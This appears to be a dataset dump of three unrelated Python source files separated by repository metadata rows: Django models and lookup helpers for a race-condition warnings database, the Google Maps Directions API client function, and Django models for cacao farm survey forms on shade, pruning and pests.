access1 = models.ForeignKey(Access, core=True, related_name="racy1")
access2 = models.ForeignKey(Access, core=True, related_name="racy2")
note = models.ForeignKey(Note, core=True, null=True)
labels = models.ManyToManyField(Label, filter_interface=models.VERTICAL)
def __str__(self):
return str(self.access1) + " [X] " + str(self.access2)
def first_labels(self):
return first_labels(2, self.labels)
def add_label(self, label):
self.labels.add(label)
def remove_label(self, label):
self.labels.remove(label)
class Admin:
list_display = ('access1', 'access2', 'first_labels')
class Race_cluster(models.Model):
races = models.ManyToManyField(Race, filter_interface=models.VERTICAL)
run = models.ForeignKey(Run)
cluster_id = models.IntegerField(null=True, core=True)
def program(self):
return str(self.run.code)
def first_race(self):
return str(self.races.all()[0])
def get_absolute_url(self):
return ('relay.warnings.views.warn_detail', [str(self.id)])
get_absolute_url = permalink(get_absolute_url)
def add_label(self, label):
for r in self.races.all():
r.add_label(label)
def remove_label(self, label):
for r in self.races.all():
r.remove_label(label)
class Admin:
list_display = ('program', 'run', 'first_race')
list_filter = ('run',)
#---- Constructors that either fetch existing matches or create new objects ----
def getCodeBase(name, ver, opt):
    return Code_base.objects.get_or_create(program_name=name, version=ver, compile_options=opt)
def getFunc(c_id, n, prog):
c_id = int(c_id)
    return Function.objects.get_or_create(cil_id=c_id, name=n, program=prog)
def findFunc(c_id, prog):
try:
c_id = int(c_id)
f = Function.objects.get(cil_id=c_id, program=prog)
return f
except:
warn('Function not found %d\n' % c_id)
return None
def getPP(f, line, parent):
args = {'line_num' : int(line), 'file_name' : f}
# NULL != NULL in SQL sucks...
if (parent == None):
args['parent_function__isnull'] = True
else:
args['parent_function'] = parent
obj, created = Program_point.objects.get_or_create(**args)
return obj
def getLval(vid, p_rep, size, decl, glob):
# NULL != NULL in SQL sucks...
args = {'printed' : p_rep , 'is_global' : glob }
if (vid == None):
args['var_id__isnull'] = True
else:
args['var_id'] = int(vid)
if(size == None):
args['rep_size__isnull'] = True
else:
args['rep_size'] = int(size)
if(decl == None):
args['declared_at__isnull'] = True
else:
args['declared_at'] = decl
obj, created = Lval.objects.get_or_create(**args)
return obj
def getCallpath(root, spawn, empty_at, edges):
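    # A stored path only matches if its (caller, callee) edge set, compared
    # in sorted order, equals the requested edges; otherwise a new
    # Call_path plus its Call_edge rows are created below.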
found = None
args = { 'root_function' : root, 'spawn_site' : spawn }
filt_args = {}
create_args = {}
filt_args.update(args)
if (empty_at == None):
filt_args['empty_ls__isnull'] = True
else:
filt_args['empty_ls'] = empty_at
matches = Call_path.objects.select_related().filter(**filt_args)
edges.sort()
# see which of the old call paths have the same set of edges
for o in matches:
db_edges = Call_edge.objects.filter(path=o).order_by(
'caller', 'callee')
e = [(e.caller, e.callee) for e in db_edges]
if (e == edges) :
found = o
break
# if it didn't find any call paths w/ the same set of edges
if (not found) :
create_args.update(args)
create_args['empty_ls'] = empty_at
found = Call_path.objects.create(**create_args)
for (f1, f2) in edges :
Call_edge.objects.create(path=found, caller=f1, callee=f2)
return found
#-------- Access factories
def matchLocksAccesses(accessMatches, locks, lv, cp, pp):
    # Return the access in accessMatches whose lock set equals locks;
    # create a new Access for (lv, cp, pp) with those locks if none matches.
    found = None
    for old in accessMatches:
        db_l = list(old.locks.all())
        if (db_l == locks):
            found = old
            break
    if (not found):
        found = Access.objects.create(lval=lv, accessed_through=cp,
                                      occurs_at=pp)
        found.locks = locks
        found.save()
    return found
def getAccess(lv, cp, pp, locks):
# make sure lists are in sorted order before comparing
locks.sort()
matches = Access.objects.select_related().filter(lval=lv, accessed_through=cp, occurs_at=pp)
# see which of the old accesses have the same set of locks
    found = matchLocksAccesses(matches, locks, lv, cp, pp)
return found
def createAccess(lv, cp, pp, locks):
acc = Access.objects.create(lval=lv, accessed_through=cp, occurs_at=pp)
acc.locks = locks
acc.save()
return acc
def getAccesses(lv, cp, pps, locks):
res = []
locks.sort()
outer_matches = Access.objects.filter(lval=lv, accessed_through=cp)
for pp in pps:
matches = outer_matches.select_related().filter(occurs_at=pp)
# see which of the old accesses have the same set of locks
        found = matchLocksAccesses(matches, locks, lv, cp, pp)
res.append(found)
return res
#----------
def getRace(acc1, acc2):
new, created = Race.objects.get_or_create(access1=acc1, access2=acc2)
return new
def createRace(acc1, acc2):
race = Race(access1=acc1, access2=acc2)
race.save()
return race
# Not useful -- use createRaceCluster instead
def getRaceCluster(races, _run):
found = None
races.sort()
matches = Race_cluster.objects.select_related().filter(run = _run)
for old in matches:
o_r = list(old.races.all())
if (o_r == races):
found = old
break
if (not found):
found = Race_cluster.objects.create(run = _run)
found.races = races
found.save()
return found
# Just create a new cluster and allow duplicates (they won't happen unless
# you try to re-use an old "run").
def createRaceCluster(cid, races, run):
# None != NULL in the Django mapping sucks...
r = Race_cluster.objects.create(run = run)
r.races = races
if (cid != None):
r.cluster_id = int(cid)
else:
print "Didn't have cluster_id"
r.save()
return r
# Add labels to races
def getLabel(labName):
lab, created = Label.objects.get_or_create(label=labName)
return lab
# TODO add label to any race clusters that match a certain location
| bsd-3-clause | -4,808,662,429,024,099,000 | 32.623907 | 98 | 0.613197 | false | 3.433462 | false | false | false |
DataReply/google-maps-services-python | googlemaps/directions.py | 12 | 5126 | #
# Copyright 2014 Google Inc. All rights reserved.
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#
"""Performs requests to the Google Maps Directions API."""
from googlemaps import convert
def directions(client, origin, destination,
mode=None, waypoints=None, alternatives=False, avoid=None,
language=None, units=None, region=None, departure_time=None,
arrival_time=None, optimize_waypoints=False, transit_mode=None,
transit_routing_preference=None):
"""Get directions between an origin point and a destination point.
:param origin: The address or latitude/longitude value from which you wish
to calculate directions.
:type origin: string or dict or tuple
    :param destination: The address or latitude/longitude value to which
        you wish to calculate directions.
:type destination: string or dict or tuple
:param mode: Specifies the mode of transport to use when calculating
directions. One of "driving", "walking", "bicycling" or "transit"
:type mode: string
    :param waypoints: Specifies an array of waypoints. Waypoints alter a
        route by routing it through the specified location(s).
    :type waypoints: a single location, or a list of locations, where a
        location is a string, dict, or tuple
:param alternatives: If True, more than one route may be returned in the
response.
:type alternatives: bool
:param avoid: Indicates that the calculated route(s) should avoid the
indicated features.
:type avoid: list or string
:param language: The language in which to return results.
:type language: string
:param units: Specifies the unit system to use when displaying results.
"metric" or "imperial"
:type units: string
:param region: The region code, specified as a ccTLD ("top-level domain"
two-character value.
:type region: string
:param departure_time: Specifies the desired time of departure.
:type departure_time: int or datetime.datetime
:param arrival_time: Specifies the desired time of arrival for transit
directions. Note: you can't specify both departure_time and
arrival_time.
:type arrival_time: int or datetime.datetime
:param optimize_waypoints: Optimize the provided route by rearranging the
waypoints in a more efficient order.
:type optimize_waypoints: bool
:param transit_mode: Specifies one or more preferred modes of transit.
This parameter may only be specified for requests where the mode is
transit. Valid values are "bus", "subway", "train", "tram", "rail".
"rail" is equivalent to ["train", "tram", "subway"].
:type transit_mode: string or list of strings
:param transit_routing_preference: Specifies preferences for transit
requests. Valid values are "less_walking" or "fewer_transfers"
:type transit_routing_preference: string
:rtype: list of routes
"""
params = {
"origin": _convert_waypoint(origin),
"destination": _convert_waypoint(destination)
}
if mode:
# NOTE(broady): the mode parameter is not validated by the Maps API
# server. Check here to prevent silent failures.
if mode not in ["driving", "walking", "bicycling", "transit"]:
raise ValueError("Invalid travel mode.")
params["mode"] = mode
if waypoints:
waypoints = convert.as_list(waypoints)
waypoints = [_convert_waypoint(waypoint) for waypoint in waypoints]
if optimize_waypoints:
waypoints = ["optimize:true"] + waypoints
params["waypoints"] = convert.join_list("|", waypoints)
if alternatives:
params["alternatives"] = "true"
if avoid:
params["avoid"] = convert.join_list("|", avoid)
if language:
params["language"] = language
if units:
params["units"] = units
if region:
params["region"] = region
if departure_time:
params["departure_time"] = convert.time(departure_time)
if arrival_time:
params["arrival_time"] = convert.time(arrival_time)
if departure_time and arrival_time:
raise ValueError("Should not specify both departure_time and"
"arrival_time.")
if transit_mode:
params["transit_mode"] = convert.join_list("|", transit_mode)
if transit_routing_preference:
params["transit_routing_preference"] = transit_routing_preference
return client._get("/maps/api/directions/json", params)["routes"]
def _convert_waypoint(waypoint):
if not convert.is_string(waypoint):
return convert.latlng(waypoint)
return waypoint
| apache-2.0 | 4,944,768,763,200,504,000 | 33.870748 | 79 | 0.677917 | false | 4.150607 | false | false | false |
shiminasai/ciat_plataforma | guias_cacao/models.py | 2 | 153154 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from mapeo.models import Persona
from sorl.thumbnail import ImageField
from multiselectfield import MultiSelectField
# Create your models here.
class FichaSombra(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha sombra"
verbose_name_plural = "Ficha sombra"
class Foto1(models.Model):
"""docstring for Foto1"""
foto = ImageField(upload_to='foto1Sombra')
ficha = models.ForeignKey(FichaSombra)
CHOICE_TIPO_PUNTO = (
(1, 'Perennifolia'),
(2, 'Caducifolia'),
)
CHOICE_TIPO_USO_PUNTO = (
(1, 'Leña'),
(2, 'Fruta'),
(3, 'Madera'),
(4, 'Sombra'),
(5, 'Nutrientes'),
)
class Especies(models.Model):
nombre = models.CharField('Nombre de la especie', max_length=250)
nombre_cientifico = models.CharField('Nombre cientifico de la especie', max_length=250, blank=True, null=True)
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO, blank=True, null=True)
tipo_uso = MultiSelectField(choices=CHOICE_TIPO_USO_PUNTO, verbose_name='Tipo de uso', blank=True, null=True)
foto = ImageField(upload_to='fotoEspecies', blank=True, null=True)
    # small (pequeña) size class
    p_altura = models.FloatField('Altura en (mt)', blank=True, null=True)
    p_diametro = models.FloatField('Diametro en (cm)', blank=True, null=True)
    p_ancho = models.FloatField('Ancho copa en (mts)', blank=True, null=True)
    # medium (mediana) size class
    m_altura = models.FloatField('Altura en (mt)', blank=True, null=True)
    m_diametro = models.FloatField('Diametro en (cm)', blank=True, null=True)
    m_ancho = models.FloatField('Ancho copa en (mts)', blank=True, null=True)
    # large (grande) size class
    g_altura = models.FloatField('Altura en (mt)', blank=True, null=True)
    g_diametro = models.FloatField('Diametro en (cm)', blank=True, null=True)
    g_ancho = models.FloatField('Ancho copa en (mts)', blank=True, null=True)
def __unicode__(self):
return self.nombre
class Meta:
verbose_name = "Especie"
verbose_name_plural = "Especies"
CHOICE_TIPO_COPA_PUNTO = (
(1, 'Copa ancha'),
(2, 'Copa angosta'),
(3, 'Copa mediana'),
)
class Punto1(models.Model):
especie = models.ForeignKey(Especies)
pequena = models.FloatField(verbose_name='Pequeña')
mediana = models.FloatField(verbose_name='Mediana')
grande = models.FloatField(verbose_name='Grande')
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO)
tipo_de_copa = models.IntegerField(choices=CHOICE_TIPO_COPA_PUNTO)
uso = models.IntegerField(choices=CHOICE_TIPO_USO_PUNTO)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Punto1"
class Cobertura1(models.Model):
cobertura = models.FloatField('% de cobertura de sombra')
ficha = models.ForeignKey(FichaSombra)
#------------------- end of point 1 --------------------------------------
class Foto2(models.Model):
"""docstring for Foto2"""
foto = ImageField(upload_to='foto2Sombra')
ficha = models.ForeignKey(FichaSombra)
class Punto2(models.Model):
especie = models.ForeignKey(Especies)
pequena = models.FloatField(verbose_name='Pequeña')
mediana = models.FloatField(verbose_name='Mediana')
grande = models.FloatField(verbose_name='Grande')
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO)
tipo_de_copa = models.IntegerField(choices=CHOICE_TIPO_COPA_PUNTO)
uso = models.IntegerField(choices=CHOICE_TIPO_USO_PUNTO)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Punto2"
class Cobertura2(models.Model):
cobertura = models.FloatField('% de cobertura de sombra')
ficha = models.ForeignKey(FichaSombra)
#------------------- end of point 2 --------------------------------------
class Foto3(models.Model):
"""docstring for Foto3"""
foto = ImageField(upload_to='foto3Sombra')
ficha = models.ForeignKey(FichaSombra)
class Punto3(models.Model):
especie = models.ForeignKey(Especies)
pequena = models.FloatField(verbose_name='Pequeña')
mediana = models.FloatField(verbose_name='Mediana')
grande = models.FloatField(verbose_name='Grande')
tipo = models.IntegerField(choices=CHOICE_TIPO_PUNTO)
tipo_de_copa = models.IntegerField(choices=CHOICE_TIPO_COPA_PUNTO)
uso = models.IntegerField(choices=CHOICE_TIPO_USO_PUNTO)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Punto3"
class Cobertura3(models.Model):
cobertura = models.FloatField('% de cobertura de sombra')
ficha = models.ForeignKey(FichaSombra)
#------------------- end of point 3 --------------------------------------
class AnalisisSombra(models.Model):
    densidad = models.IntegerField(
        choices=((1, 'Alta'), (2, 'Adecuada'), (3, 'Baja')),
        verbose_name='Densidad de árboles de sombra')
    forma_copa = models.IntegerField(
        choices=((1, 'Ancha'), (2, 'Adecuada'), (3, 'Angosta')),
        verbose_name='Forma de copa de árboles de sombra')
    arreglo = models.IntegerField(
        choices=((1, 'Uniforme'), (2, 'Desuniforme')),
        verbose_name='Arreglo de árboles')
    hojarasca = models.IntegerField(
        choices=((1, 'Suficiente'), (2, 'No Suficiente')),
        verbose_name='Cantidad de hojarasca')
    calidad_hojarasca = models.IntegerField(
        choices=((1, 'Rico en nutrientes'), (2, 'Pobre en nutriente')),
        verbose_name='Calidad de hojarasca')
    competencia = models.IntegerField(
        choices=((1, 'Fuerte'), (2, 'Mediana'), (3, 'Leve')),
        verbose_name='Competencia de árboles con cacao')
    Problema = models.IntegerField(
        choices=((1, 'Cobertura'), (2, 'Mal arreglo'), (3, 'Competencia'),
                 (4, 'Densidad Tipo de árboles'), (5, 'Ninguno')),
        verbose_name='Problema de sombra')
    ficha = models.ForeignKey(FichaSombra)
    class Meta:
        verbose_name_plural = "Análisis sobre sombra y árboles de sombra"
CHOICE_ACCIONES_SOMBRA = (
(1, 'Reducir la sombra'),
(2, 'Aumentar la sombra'),
(3, 'Ninguna'),
)
CHOICE_PODA = (
(1, 'Si'),
(2, 'No'),
)
CHOICE_TODO = (
(1, 'En todo la parcela '),
(2, 'Solo en una parte de la parcela'),
)
class AccionesSombra(models.Model):
accion = models.IntegerField(
choices=CHOICE_ACCIONES_SOMBRA,
verbose_name="Que acciones hay que realizar ")
ficha = models.ForeignKey(FichaSombra)
class ReducirSombra(models.Model):
poda = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Podando árboles")
poda_cuales = models.CharField(max_length=350)
eliminando = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Cambiando árboles")
eliminando_cuales = models.CharField(max_length=350)
todo = models.IntegerField(
choices=CHOICE_TODO,
verbose_name="En todo la parcela o Solo en una parte de la parcela")
que_parte = models.CharField(max_length=250)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Si marca reducir la sombra"
class AumentarSombra(models.Model):
sembrando = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Sembrando árboles")
sembrando_cuales = models.CharField(max_length=350)
cambiando = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Cambiando árboles")
cambiando_cuales = models.CharField(max_length=350)
todo = models.IntegerField(
choices=CHOICE_TODO,
verbose_name="En todo la parcela o Solo en una parte de la parcela")
que_parte = models.CharField(max_length=250)
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name_plural = "Si marca aumentar la sombra"
class ManejoSombra(models.Model):
herramientas = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene herramienta para manejo de sombra? ")
formacion = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene formación para manejo de sombra? ")
ficha = models.ForeignKey(FichaSombra)
class Meta:
verbose_name = "Herramienta y formación de sombras"
#-------------------------- end of ficha sombra ---------------------------
class FichaPoda(models.Model):
productor = models.ForeignKey(
Persona,
verbose_name='Nombre de productor o productora',
related_name='setproductor')
tecnico = models.ForeignKey(
Persona,
verbose_name='Nombre de técnico',
related_name='settecnico')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha poda"
verbose_name_plural = "Ficha poda"
CHOICE_SI_NO = (
(1, 'Si'),
(2, 'No'),
)
CHOICE_PRODUCCION = (
(1, 'Alta'),
(2, 'Media'),
(3, 'Baja'),
)
CHOICE_PLANTAS1 = (
(1, 'Altura en mt'),
(2, 'Ancho de copa mt'),
)
CHOICE_PLANTAS2 = (
    (1, 'Formación de horqueta'),
    (2, 'Ramas en contacto'),
    (3, 'Ramas entrecruzadas'),
    (4, 'Ramas cercanas al suelo'),
    (5, 'Chupones'),
    (6, 'Penetración de Luz'),
)
CHOICE_PLANTAS3 = (
(1, 'Nivel de producción'),
)
class Punto1A(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS1)
uno = models.FloatField(verbose_name='1')
dos = models.FloatField(verbose_name='2')
tres = models.FloatField(verbose_name='3')
cuatro = models.FloatField(verbose_name='4')
cinco = models.FloatField(verbose_name='5')
seis = models.FloatField(verbose_name='6')
siete = models.FloatField(verbose_name='7')
ocho = models.FloatField(verbose_name='8')
nueve = models.FloatField(verbose_name='9')
diez = models.FloatField(null=True, blank=True, verbose_name='10')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto1B(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS2)
uno = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto1C(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
#----------------------------- end of point 1 ---------------------------
class Punto2A(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS1)
uno = models.FloatField(verbose_name='1')
dos = models.FloatField(verbose_name='2')
tres = models.FloatField(verbose_name='3')
cuatro = models.FloatField(verbose_name='4')
cinco = models.FloatField(verbose_name='5')
seis = models.FloatField(verbose_name='6')
siete = models.FloatField(verbose_name='7')
ocho = models.FloatField(verbose_name='8')
nueve = models.FloatField(verbose_name='9')
diez = models.FloatField(null=True, blank=True, verbose_name='10')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto2B(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS2)
uno = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto2C(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
#------------ end of point 2 ----------------------------
class Punto3A(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS1)
uno = models.FloatField(verbose_name='1')
dos = models.FloatField(verbose_name='2')
tres = models.FloatField(verbose_name='3')
cuatro = models.FloatField(verbose_name='4')
cinco = models.FloatField(verbose_name='5')
seis = models.FloatField(verbose_name='6')
siete = models.FloatField(verbose_name='7')
ocho = models.FloatField(verbose_name='8')
nueve = models.FloatField(verbose_name='9')
diez = models.FloatField(null=True, blank=True, verbose_name='10')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto3B(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS2)
uno = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_SI_NO, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
class Punto3C(models.Model):
plantas = models.IntegerField(choices=CHOICE_PLANTAS3)
uno = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='1')
dos = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='2')
tres = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='3')
cuatro = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='4')
cinco = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='5')
seis = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='6')
siete = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='7')
ocho = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='8')
nueve = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='9')
diez = models.IntegerField(choices=CHOICE_PRODUCCION, verbose_name='10', null=True, blank=True)
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return self.get_plantas_display()
# -------------------- end of point 3 ----------------------------
CHOICES_PROBLEMA_PLANTA = (('A', 'Altura'),
('B', 'Ancho'),
('C', 'Ramas'),
('D', 'Horqueta'),
('E', 'Chupones'),
('F', 'Poca entrada de Luz'),
('G', 'Baja productividad'),
('H', 'Ninguna'),
)
CHOICES_TIPO_PODA = (('A', 'Poda de copa'),
('B', 'Poda de ramas'),
('C', 'Ramas'),
('D', 'Formar horquetas'),
('E', 'Deschuponar'),
('F', 'Ninguna'),
)
CHOICE_REALIZA_PODA = (
(1, 'En toda la parcela'),
(2, 'En Varios partes'),
(3, 'En algunas partes'), )
CHOICE_VIGOR = (
(1, 'Todas'),
(2, 'Algunas'),
(3, 'Ninguna'), )
CHOICE_ENTRADA_LUZ = (
(1, 'Poda de copa'),
(2, 'Quitar ramas entrecruzadas'),
(3, 'Arreglar la sombra'),
)
CHOICES_FECHA_PODA = (('A', 'Enero'),
('B', 'Febrero'),
('C', 'Marzo'),
('D', 'Abril'),
('E', 'Mayo'),
('F', 'Junio'),
('G', 'Julio'),
('H', 'Agosto'),
('I', 'Septiembre'),
('J', 'Octubre'),
('K', 'Noviembre'),
('L', 'Diciembre'),
)
class AnalisisPoda(models.Model):
campo1 = MultiSelectField(choices=CHOICES_PROBLEMA_PLANTA, verbose_name='¿Cuáles son los problemas principales en cuanto a las estructuras de las plantas?')
campo2 = MultiSelectField(choices=CHOICES_TIPO_PODA, verbose_name='¿Qué tipo de poda podemos aplicar para mejorar la estructura de las plantas?')
campo3 = models.IntegerField(choices=CHOICE_REALIZA_PODA, verbose_name='¿Dónde se va a realizar la poda para mejorar la estructura de las plantas?')
campo4 = models.IntegerField(choices=CHOICE_VIGOR, verbose_name='Las plantas tienen suficiente vigor, hojas y ramas para ser podadas?')
campo5 = models.IntegerField(choices=CHOICE_ENTRADA_LUZ, verbose_name='¿Cómo podemos mejorar la entrada de luz en las plantas con la poda?')
campo6 = MultiSelectField(choices=CHOICES_FECHA_PODA, verbose_name='¿Cuándo se van a realizar las podas?')
ficha = models.ForeignKey(FichaPoda)
def __unicode__(self):
return 'Analisis'
class Meta:
verbose_name_plural = 'Análisis de poda y acciones'
class ManejoPoda(models.Model):
herramientas = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene herramienta para manejo de poda? ")
formacion = models.IntegerField(
choices=CHOICE_PODA,
verbose_name="Tiene formación para manejo de poda? ")
ficha = models.ForeignKey(FichaPoda)
class Meta:
verbose_name = "Herramienta y formación de poda"
# ---------------------------- fin de ficha poda ------------------------------
class FichaPlaga(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_plaga')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_plaga')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha plaga"
verbose_name_plural = "Ficha plaga"
CHOICE_ENFERMEDADES_CACAOTALES = (
(1, 'Monilia'),
(2, 'Mazorca negra'),
(3, 'Mal de machete'),
(4, 'Mal de talluelo en el vivero'),
(5, 'Barrenadores de tallo'),
(6, 'Zompopos'),
(7, 'Chupadores o áfidos'),
(8, 'Escarabajos'),
(9, 'Comején'),
(10, 'Ardillas'),
(11, 'Otros'),
)
class PlagasEnfermedad(models.Model):
plagas = models.IntegerField(choices=CHOICE_ENFERMEDADES_CACAOTALES,
blank=True, null=True, verbose_name="Plagas y enfermedades")
visto = models.IntegerField(choices=CHOICE_SI_NO,
blank=True, null=True, verbose_name="He visto en mi cacaotal")
dano = models.IntegerField(choices=CHOICE_SI_NO,
blank=True, null=True, verbose_name="Hace daño año con año")
promedio = models.FloatField("¿Promedio nivel de daño en %?")
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"PlagasEnfermedad"
CHOICE_ACCIONES_ENFERMEDADES = (
(1, 'Recuento de plagas'),
(2, 'Cortar las mazorcas enfermas'),
(3, 'Abonar las plantas'),
(4, 'Aplicar Caldos'),
(5, 'Aplicar Fungicidas'),
(6, 'Manejo de sombra'),
(7, 'Podar las plantas de cacao'),
(8, 'Aplicar venenos para Zompopo'),
(9, 'Control de Comején'),
    (10, 'Ahuyentar Ardillas'),
(11, 'Otras'),
)
class AccionesEnfermedad(models.Model):
plagas_acciones = models.IntegerField(choices=CHOICE_ACCIONES_ENFERMEDADES,
blank=True, null=True, verbose_name="Manejo de Plagas y enfermedadess")
realiza_manejo = models.IntegerField(choices=CHOICE_SI_NO,
blank=True, null=True, verbose_name="Realiza en manejo")
cuantas_veces = models.IntegerField(blank=True, null=True,
verbose_name="Cuantas veces realizan el manejo")
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses realizan el manejo')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"AccionesEnfermedad"
class Meta:
verbose_name = "ACCIONES MANEJO DE PLAGAS Y ENFERMEDADE"
CHOICE_ORIENTACION = (
("A", 'Técnico'),
("B", 'Casa comercial'),
("C", 'Cooperativa'),
("D", 'Otros productores'),
("E", 'Experiencia propia/costumbres'),
("F", 'Otros medio de comunicación'),
)
class Orientacion(models.Model):
